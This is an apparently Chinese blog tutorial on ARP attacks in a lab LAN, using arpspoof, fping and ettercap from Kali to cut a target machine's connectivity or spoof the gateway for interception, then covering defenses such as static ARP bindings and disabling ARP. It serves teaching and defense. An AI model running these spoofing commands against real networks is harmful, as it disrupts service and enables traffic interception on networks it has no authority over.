59.局域网内arp攻击(Linux)
2018-09-30 本文已影响0人
扶桑啊啊
一、arp断网攻击
arp攻击是针对同一局域网内的靶机发起攻击,使被攻击的靶机断网,需要知道被攻击目标的地址,网关,和本机网卡。
1.用命令查询需要知道的信息
arpspoof -i 网卡 -t 目标IP 网关 //arp攻击
ifconfig //查看目标机ip和网卡(在目标机查看,如果不能进入目标机,则用fping在攻击机上查看存活ip)
cat /etc/resolv.conf //查看目标机网关
fping -asg 192.168.252.0/24 //查看局域网当中存活的ip

2.用errercap图形化工具来查询靶机信息
errercap -G

选择Sniff——Unified sniffing(统一嗅探)(默认eth0)——Hosts——Scan for hosts


3.确定靶机IP和网关后,可以发起断网攻击。
kali系统发起攻击
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2

攻击前ping百度是正常的。

当受到攻击时,ping百度就不通了。说明目标机在受到攻击时,网络被迫中断。

当kali放开攻击时,目标机网络连接正常。
二、arp欺骗攻击是冒充网关向靶机发送假的arp数据包。
echo 1 > /proc/sys/net/ipv4/ip_forward //冒充过程
arpspoof -i eth0 -t 192.168.252.131 192.168.252.2 //欺骗攻击
发起arp欺骗攻击时,被攻击的靶机不会断网。

三、防止arp攻击
一般在网上通讯的时候网关的IP和MAC的绑定是放在arp 缓存里面的,假的arp包就会刷新这个缓存,导致本该发送到网关的数据包发到了欺骗者那里。

1.防止arp攻击的一种有效方式是静态arp。将网关的ip和MAC进行绑定。使攻击者无法假装网关对靶机进行攻击。
vim /etc/ethers
192.168.252.2 00:50:56:e0:7e:06

刷新arp发现网关后多了一个M,表示静态网关

再次尝试用kali攻击靶机,发现,即使在攻击中,靶机也可以照常使用网络。

ps:解除绑定命令
arp -d 192.168.252.2

2.第二种方式是关闭arp解析功能
ifconfig eth0 -arp //关闭arp
但是,这样就不能跟局域网内其他用户进行通信了,也就不能使用xshell来连接虚拟机了。
ifconfig eth0 arp //开启arp解析功能